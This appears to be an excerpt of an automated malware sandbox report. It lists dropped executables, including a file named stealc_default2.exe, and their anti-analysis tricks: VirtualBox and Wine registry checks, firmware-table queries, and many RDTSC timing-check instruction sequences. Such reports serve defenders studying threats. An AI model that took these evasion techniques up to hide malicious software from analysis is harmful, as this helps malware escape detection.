                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_17-77361
                          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 1245AD4
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 12B9E0E
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 11F5364
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 114A544
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 1169810
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 131F1DA
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 1165B58
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeAPI/Special instruction interceptor: Address: 15DCF4A
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F44F second address: A6F455 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2528 second address: BE2536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2536 second address: BE2559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2835h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2559 second address: BE2571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F927881D80Dh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE285B second address: BE2887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE2834h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2887 second address: BE288B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE288B second address: BE289A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE289A second address: BE28A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5484 second address: BE54A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F9278BE2826h 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE54A1 second address: BE54A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE54A7 second address: BE54AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE54AB second address: BE54F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jbe 00007F927881D808h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007F927881D810h 0x00000022 jmp 00007F927881D815h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE54F8 second address: BE54FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE54FC second address: BE5514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE559E second address: BE560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9278BE2828h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D190Ah], edx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D1C03h] 0x00000030 call 00007F9278BE2829h 0x00000035 push ecx 0x00000036 jmp 00007F9278BE282Fh 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F9278BE2834h 0x00000044 push esi 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE560C second address: BE5610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5610 second address: BE562C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Fh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE562C second address: BE5640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5640 second address: BE5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5644 second address: BE564A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE564A second address: BE5701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F9278BE2830h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F9278BE2828h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push ecx 0x0000002e push edi 0x0000002f sub dword ptr [ebp+122D2401h], edi 0x00000035 pop edi 0x00000036 pop edx 0x00000037 sub dword ptr [ebp+122D1C09h], ebx 0x0000003d push 00000003h 0x0000003f mov dword ptr [ebp+122D1843h], eax 0x00000045 push 00000000h 0x00000047 jmp 00007F9278BE2836h 0x0000004c push 00000003h 0x0000004e call 00007F9278BE2835h 0x00000053 jmp 00007F9278BE2836h 0x00000058 pop edi 0x00000059 push A7C0AC2Ah 0x0000005e push ebx 0x0000005f jnp 00007F9278BE282Ch 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE584E second address: BE586B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D818h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE586B second address: BE589B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F9278BE283Dh 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE589B second address: BE58B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F927881D80Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE58B5 second address: BE58BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04EAA second address: C04EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007F927881D806h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04EBA second address: C04EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05281 second address: C05289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05289 second address: C0528E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0528E second address: C052E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F927881D817h 0x0000000c js 00007F927881D806h 0x00000012 popad 0x00000013 jmp 00007F927881D811h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push ecx 0x0000001c jo 00007F927881D806h 0x00000022 pop ecx 0x00000023 pushad 0x00000024 jmp 00007F927881D80Dh 0x00000029 jp 00007F927881D806h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05437 second address: C05451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05451 second address: C05457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05891 second address: C058CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F9278BE2828h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9278BE2833h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9278BE2839h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C058CD second address: C058DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D80Ch 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05A75 second address: C05A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05A7B second address: C05A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05A7F second address: C05A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F9278BE2826h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05BEA second address: C05BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05BF0 second address: C05BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05D3F second address: C05D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05D43 second address: C05D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05D47 second address: C05D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05D51 second address: C05D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05D64 second address: C05D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05E9E second address: C05EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F9278BE283Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05EAD second address: C05EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D813h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05EC4 second address: C05EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2836h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C068D5 second address: C068DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C068DB second address: C068E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C068E3 second address: C068FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D811h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06EC7 second address: C06ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06ECD second address: C06ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06ED1 second address: C06EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007F9278BE2826h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06EFE second address: C06F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09186 second address: C091AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2839h 0x00000009 pop ecx 0x0000000a jnl 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1DD8 second address: BD1E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F927881D813h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A691 second address: C0A695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
